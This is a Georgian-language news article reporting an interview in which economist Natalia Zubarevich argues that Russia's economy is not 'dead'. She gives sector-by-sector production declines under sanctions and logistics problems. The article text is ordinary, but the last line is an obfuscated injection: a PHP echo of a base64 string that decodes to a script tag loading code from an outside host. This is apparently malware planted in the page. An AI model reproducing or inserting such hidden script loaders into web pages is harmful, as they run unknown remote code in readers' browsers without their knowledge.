celsiusi
ავერსი შნაიდერი
 
მოსკოვის სახელმწიფო უნივერსიტეტის რუსეთის ეკონომიკური და სოციალური გეოგრაფიის კათედრის პროფესორი, ნატალია ზუბარევიჩის განცხადებით, იმის თქმა, რომ რუსეთის ეკონომიკა გარდაიცვალა, არასწორია, – ამის შესახებ მან რადიო "მაესტროსთან" ექსკლუზიურ ინტერვიუში ისაუბრა. 
მისივე თქმით, ნავთობზე ამოქმედებულ სანქციაზე, საუბარი ნაადრევია, ვინაიდან საჭიროა დინამიკას დავაკვირდეთ. 
"ჯერ ნუ მკითხავთ, შედეგი ჯერ გაუგებარია, ამოქმედებიდან ჯერ სულ რაღაც რამდენიმე დღეა გასული, საჭიროა დინამიკას დავაკვირდეთ, დაველოდოთ, როგორ წავა პროცესი. სხვადსახსვა პროგნოზები კეთდება, მაგრამ ცხოვრება პროგნოზებზე უფრო რთულია. ამიტომ, მოდით ჯერ დაველოდოთ." – განაცხადა მან. 
მან ასევე განიხილა დეტალურად და პროცენტულად ის ვითარება რაც რუსულ ეკონომიკაში დღეს არის და ისაუბრა ყველა იმპრობლემაზე რაც რუსულ ეკონომიკას ამ დროისთვის გააჩნია.
"რაც შეეხება სხვა სანქციებს, ასე თუ ისე გასაგებია, დაწყებული შემცირება იმ დარგებში, რომლებიც სანქციების ქვეშ მოექცნენ. მეტალურგიის მიმართულებით, ფოლადი - 16% არის შემცირებული, მეტყევეობა, ხის დამუშავება-მრეწველობა - 20% არის შემცირებული.  ცალკეული სახის პროდუქტებში, როგორიც არის მაგალითად ფანერი (პლაივუდი) - შემცირება 37%-ით გვაქვს.  ეს არის სანქციების შედეგი, ეს 2022 წლის ოქტომბრის დინამიკაა, რომელიც შედარებულია 2021 წლის ანალოგიურ პერიოდთან. არა სანქციები, არამედ ის რაც რუსეთის ხელისუფლების გადაწყვეტილებით მოხდა, ეს გაზის სექტორს ეხება. ბუნებრივი აირის წარმოება 20%-ით არის შემცირებული. რაც შეეხება, ბუნებრივი აირის ექსპორტს, შემცირებულია, ორჯერ, სამჯერ. მაგრამ, როგორც გითხარით, ეს სანქციებით არ არის გამოწვეული, ეს რუსეთის ხელისუფლების მიერ მიღებული გადაწყვეტილებაა. ნავთობის მიმართულებას რაც შეეხება, აქ ნუ ვიჩქარებთ, ვინაიდან, ბოლო სამი თვის განმავლობაში ნავთობის მოპოვება იზრდებოდა, არანაირი შემცირება ამ მხრივ არ ყოფილა. იმიტომ რომ რუსული კომპანიები ნავთობს მესამე ქვეყნებსაც აწვდიდნენ, როგორიც არიან ინდოეთი, თურქეთი და ჩინეთი. ევროპაც უფრო მეტს ყიდულობდა, რომ მარაგები შეექმნა ემბარგოს ამოქმედებამდე. ამიტომ, როგორც გითხარით, ამ მხრივ უმჯობესია დაკვირვება გავაგრძელოთ. ის რომ რუსეთიდან საერთაშორისო კომპანიები გავიდნენ, ეს არ არის სანქციები, ეს ბიზნესის გადაწყვეტილებაა, რამაც   მსუბუქი ავტომობილების წარმოების მძლავრი შემცირება გამოიწვია, წარმოება სამჯერ შემცირდა და დღეს შეადგენს 35-36%. გაზაფხულზე შემიცირება სახეზე იყო, მაგრამ “ლადამ” დაიწყო ძველი, 90-ნების ტექნოლოგიებით ავტომობილების წარმოება, ამას ემატება ჩინური ავტომობილების წარმოება, ამიტომ შემცირება თუ იყო 30 ჯერ ნაკლები, დღეს ეს შემცირება მხოლოდ სამჯერ ნაკლებია. ძალიან ბევრი პრობლემებია პროდუქციასთან, რომელიც იწყობა იმპორტირებული დეტალებისგან. ანუ, სანქცია არ არის, მაგრამ ლოგისტიკის პრობლემები არსებობს, მაგალითად, ისეთი პროდუქციისთვის, როგორიც არის ლიფტი, მათი წარმოება 25%-მდეა შემცირებული, სარეცხი მაქანები - ორჯერ არის შემცირებული, მაცივრების წარმოება, აქ კლება 40%-ს შეადგენს. ამიტომ, პრობლემა ბევრია, მაგრამ იმის თქმა, რომ რუსეთის ეკონომიკა გარდაიცვალა, არასწორია!" – აღნიშნა ნატალია ზუბარევიჩმა. 
ინტერვიუს სრულად ნახვა შესაძლებელია აქ: 
464
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");